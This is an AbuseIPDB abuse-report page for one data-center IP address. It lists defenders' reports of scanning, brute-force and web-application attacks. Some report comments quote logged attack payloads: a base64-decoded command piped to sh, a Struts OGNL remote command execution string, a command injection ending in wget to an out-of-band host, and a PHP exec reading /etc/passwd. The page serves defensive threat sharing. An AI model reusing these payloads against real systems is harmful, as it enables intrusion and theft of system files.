JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 89.117.62.30

89.117.62.30 was found in our database!

This IP was reported 23 times. Confidence of Abuse is 100%: ?

100%

ISP	IPXO
Usage Type	Data Center/Web Hosting/Transit
ASN	AS51167
Hostname(s)	vmi3338253.contaboserver.net
Domain Name	telecentras.lt
Country	🇫🇷 France
City	Lauterbourg, Grand Est

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 89.117.62.30

Whois 89.117.62.30

IP Abuse Reports for 89.117.62.30:

This IP address has been reported a total of 23 times from 17 distinct sources. 89.117.62.30 was first reported on June 3rd 2026, and the most recent report was 4 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇫🇷 IRISIO	2026-06-04 12:15:03 (4 hours ago)	scans/SQL injection/spam posts : 73 queries	Web App Attack SQL Injection
🇬🇧 openstrike.co.uk	2026-06-04 05:13:23 (11 hours ago)	26 attacks on PHP URLs, Confluence URLs: GET /php/setup.php?step=4&PDF2SWF_PATH=echo+Y3VybCBvYXN0LnB ... show more 26 attacks on PHP URLs, Confluence URLs: GET /php/setup.php?step=4&PDF2SWF_PATH=echo+Y3VybCBvYXN0LnBybw==+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1 GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 show less	Web App Attack
🇳🇱 Site.eu	2026-06-04 00:36:16 (16 hours ago)	Excessive multi-domain requests	Brute-Force
🇺🇸 nyt	2026-06-04 00:08:50 (16 hours ago)	Hacking, Web App Attack, suspicious: Log4Shell/JNDI	Hacking Web App Attack
🇧🇾 lns.bz	2026-06-04 00:06:21 (16 hours ago)	Too many 404 requests [BY]	Web App Attack
🇺🇸 Rip	2026-06-03 22:12:56 (18 hours ago)	Remote Command Execution - Unix Shell Expression Found in URI	Web App Attack
Anonymous	2026-06-03 20:47:29 (20 hours ago)	Ports: *; Direction: 0; Trigger: CT_LIMIT	Brute-Force SSH
🇳🇱 wlt-blocker	2026-06-03 13:11:09 (1 day ago)	Unauthorized access to webpage admin	Web App Attack
Anonymous	2026-06-03 13:07:42 (1 day ago)	Blocked: Reason='Suspicious traffic score=60 (review-based detection)'; Requests=34	Hacking
🇫🇷 IRISIO	2026-06-03 12:46:27 (1 day ago)	scans/SQL injection/spam posts : 49 queries	Web App Attack SQL Injection
🇳🇱 e.fierstra	2026-06-03 12:28:26 (1 day ago)	ModSecurity hits exceeded	Bad Web Bot Web App Attack
Anonymous	2026-06-03 11:45:06 (1 day ago)	Bot / scanning and/or hacking attempts: POST /wp-admin/admin-ajax.php HTTP/1.1, POST / HTTP/1.1, GET ... show more Bot / scanning and/or hacking attempts: POST /wp-admin/admin-ajax.php HTTP/1.1, POST / HTTP/1.1, GET /cgi-bin/status HTTP/1.1, GET /test.cgi HTTP/1.1, GET /cgi-bin/stats HTTP/1.1, GET /cgi-bin/status/status.cgi HTTP/1.1, GET /?XDEBUG_SESSION_START=3EbuaY7l9fJSFmy4vDkdMgfCrPs HTTP/1.1, POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1, POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%, POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code., GET /debug.cgi HTTP/1.1, GET /cgi-bin/test-cgi HTTP/1.1, GET /cgi-bin/test.cgi HTTP/1.1, GET / HTTP/1.1, GET /cgi-bin/test HTTP/1.1, mac=1&ip=127.0.0.1\|wget d8frnrc58u0dfmljpjlgpi8yqxgffu5pa.oast. show less	Hacking Web App Attack
🇺🇸 kosada.com	2026-06-03 10:32:32 (1 day ago)	Web PHP injection: exec(x22cat /etc/passwdx22);	Web App Attack
🇺🇸 TPI-Abuse	2026-06-03 09:41:39 (1 day ago)	(mod_security) mod_security (id:217200) triggered by 89.117.62.30 (vmi3338253.contaboserver.net): 1 ... show more (mod_security) mod_security (id:217200) triggered by 89.117.62.30 (vmi3338253.contaboserver.net): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Jun 03 05:41:33.955426 2026] [security2:error] [pid 6520:tid 6520] [client 89.117.62.30:41288] ModSecurity: Access denied with code 403 (phase 1). Match of "endsWith /wp-cron.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/12_HTTP_Protocol.conf"] [line "103"] [id "217200"] [rev "2"] [msg "COMODO WAF: HTTP/1.1 POST request missing Content-Length Header\|\|aallred.com\|F\|2"] [data "/guest_auth/guestisup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "aallred.com"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ah_2zQ78FegiE-bt8sdcvgAAAAI"] show less	Brute-Force Bad Web Bot Web App Attack
Anonymous	2026-06-03 09:10:38 (1 day ago)	Ports: 80,443; Direction: 0; Trigger: LF_CUSTOMTRIGGER	Brute-Force SSH

Showing 1 to 15 of 23 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 66.132.195.47

🇳🇱 45.148.10.152

🇳🇱 45.148.10.62

🇮🇩 2406:da19:776:6e02:4fdc:c602:6f78:4bd6

🇩🇪 194.88.98.99

🇩🇪 167.94.146.77

🇨🇳 150.255.254.48

🇵🇰 111.68.98.152

🇨🇳 60.166.82.166

🇺🇸 34.67.144.12

🇺🇸 205.210.31.81

🇨🇳 203.189.221.17

🇲🇾 203.56.25.193

🇸🇬 152.42.160.174

🇫🇮 147.185.133.0

🇨🇳 122.97.209.137

🇮🇳 106.192.196.185

🇮🇩 103.151.227.222

🇷🇴 2.57.121.112

🇮🇳 223.181.125.16